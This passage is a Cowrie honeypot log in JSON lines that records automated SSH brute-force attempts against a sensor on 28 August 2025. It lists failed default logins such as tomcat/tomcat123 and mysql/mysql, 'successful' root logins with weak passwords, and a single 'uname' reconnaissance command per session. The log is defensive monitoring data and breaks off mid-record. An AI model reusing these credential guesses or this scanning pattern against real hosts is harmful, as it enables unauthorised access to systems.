{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:51:22.624043Z","src_ip":"212.227.125.160","session":"196d07753cd0"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:51:23.530348Z","src_ip":"212.227.125.160","session":"196d07753cd0"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:51:24.758618Z","src_ip":"212.227.125.160","session":"196d07753cd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59318,"dst_ip":"1.2.3.4","dst_port":22,"session":"994fe5cc84b3","protocol":"ssh","message":"New connection: 212.227.235.229:59318 (1.2.3.4:22) [session: 994fe5cc84b3]","sensor":"my-vps","timestamp":"2025-08-28T06:51:28.970126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:51:28.970914Z","src_ip":"212.227.235.229","session":"994fe5cc84b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:51:29.220438Z","src_ip":"212.227.235.229","session":"994fe5cc84b3"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:51:30.215584Z","src_ip":"212.227.235.229","session":"994fe5cc84b3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:51:31.467439Z","src_ip":"212.227.235.229","session":"994fe5cc84b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43012,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4ad8804ba7","protocol":"ssh","message":"New connection: 212.227.125.160:43012 (1.2.3.4:22) [session: fa4ad8804ba7]","sensor":"my-vps","timestamp":"2025-08-28T06:51:38.728089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:51:38.729051Z","src_ip":"212.227.125.160","session":"fa4ad8804ba7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:51:38.947868Z","src_ip":"212.227.125.160","session":"fa4ad8804ba7"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-28T06:51:39.609701Z","src_ip":"212.227.125.160","session":"fa4ad8804ba7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:51:40.831803Z","src_ip":"212.227.125.160","session":"fa4ad8804ba7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39144,"dst_ip":"1.2.3.4","dst_port":22,"session":"64704833a73e","protocol":"ssh","message":"New connection: 212.227.235.229:39144 (1.2.3.4:22) [session: 64704833a73e]","sensor":"my-vps","timestamp":"2025-08-28T06:51:45.372994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:51:45.373646Z","src_ip":"212.227.235.229","session":"64704833a73e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:51:45.623595Z","src_ip":"212.227.235.229","session":"64704833a73e"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-28T06:51:46.375810Z","src_ip":"212.227.235.229","session":"64704833a73e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:51:47.628367Z","src_ip":"212.227.235.229","session":"64704833a73e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47714,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a936ce4043a","protocol":"ssh","message":"New connection: 212.227.125.160:47714 (1.2.3.4:22) [session: 7a936ce4043a]","sensor":"my-vps","timestamp":"2025-08-28T06:51:55.016657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:51:55.019233Z","src_ip":"212.227.125.160","session":"7a936ce4043a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:51:55.246884Z","src_ip":"212.227.125.160","session":"7a936ce4043a"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:51:55.931673Z","src_ip":"212.227.125.160","session":"7a936ce4043a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:51:56.406645Z","src_ip":"212.227.125.160","session":"7a936ce4043a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:51:56.407446Z","src_ip":"212.227.125.160","session":"7a936ce4043a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:51:56.636686Z","src_ip":"212.227.125.160","session":"7a936ce4043a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:51:56.637947Z","src_ip":"212.227.125.160","session":"7a936ce4043a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40782,"dst_ip":"1.2.3.4","dst_port":22,"session":"d102710933c7","protocol":"ssh","message":"New connection: 212.227.235.229:40782 (1.2.3.4:22) [session: d102710933c7]","sensor":"my-vps","timestamp":"2025-08-28T06:52:01.480362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:52:01.481458Z","src_ip":"212.227.235.229","session":"d102710933c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:52:01.742306Z","src_ip":"212.227.235.229","session":"d102710933c7"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:52:02.526390Z","src_ip":"212.227.235.229","session":"d102710933c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:52:03.137125Z","src_ip":"212.227.235.229","session":"d102710933c7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:52:03.137918Z","src_ip":"212.227.235.229","session":"d102710933c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:03.399990Z","src_ip":"212.227.235.229","session":"d102710933c7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:03.401369Z","src_ip":"212.227.235.229","session":"d102710933c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39338,"dst_ip":"1.2.3.4","dst_port":22,"session":"c66a3fc48c7c","protocol":"ssh","message":"New connection: 212.227.125.160:39338 (1.2.3.4:22) [session: c66a3fc48c7c]","sensor":"my-vps","timestamp":"2025-08-28T06:52:11.307617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:52:11.324994Z","src_ip":"212.227.125.160","session":"c66a3fc48c7c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:52:11.527233Z","src_ip":"212.227.125.160","session":"c66a3fc48c7c"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:52:12.395517Z","src_ip":"212.227.125.160","session":"c66a3fc48c7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:52:12.867721Z","src_ip":"212.227.125.160","session":"c66a3fc48c7c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:52:12.868375Z","src_ip":"212.227.125.160","session":"c66a3fc48c7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:13.092716Z","src_ip":"212.227.125.160","session":"c66a3fc48c7c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:13.093864Z","src_ip":"212.227.125.160","session":"c66a3fc48c7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38576,"dst_ip":"1.2.3.4","dst_port":22,"session":"90241142f77e","protocol":"ssh","message":"New connection: 212.227.235.229:38576 (1.2.3.4:22) [session: 90241142f77e]","sensor":"my-vps","timestamp":"2025-08-28T06:52:17.937060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:52:17.937943Z","src_ip":"212.227.235.229","session":"90241142f77e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:52:18.190537Z","src_ip":"212.227.235.229","session":"90241142f77e"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:52:18.948874Z","src_ip":"212.227.235.229","session":"90241142f77e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:52:19.538903Z","src_ip":"212.227.235.229","session":"90241142f77e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:52:19.539620Z","src_ip":"212.227.235.229","session":"90241142f77e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:19.793112Z","src_ip":"212.227.235.229","session":"90241142f77e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:19.794286Z","src_ip":"212.227.235.229","session":"90241142f77e"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":48796,"dst_ip":"1.2.3.4","dst_port":23,"session":"86e3ca29f229","protocol":"telnet","message":"New connection: 8.222.212.69:48796 (1.2.3.4:23) [session: 86e3ca29f229]","sensor":"my-vps","timestamp":"2025-08-28T06:52:21.882176Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49264,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea62ec23feca","protocol":"ssh","message":"New connection: 212.227.125.160:49264 (1.2.3.4:22) [session: ea62ec23feca]","sensor":"my-vps","timestamp":"2025-08-28T06:52:27.653606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:52:27.654407Z","src_ip":"212.227.125.160","session":"ea62ec23feca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hm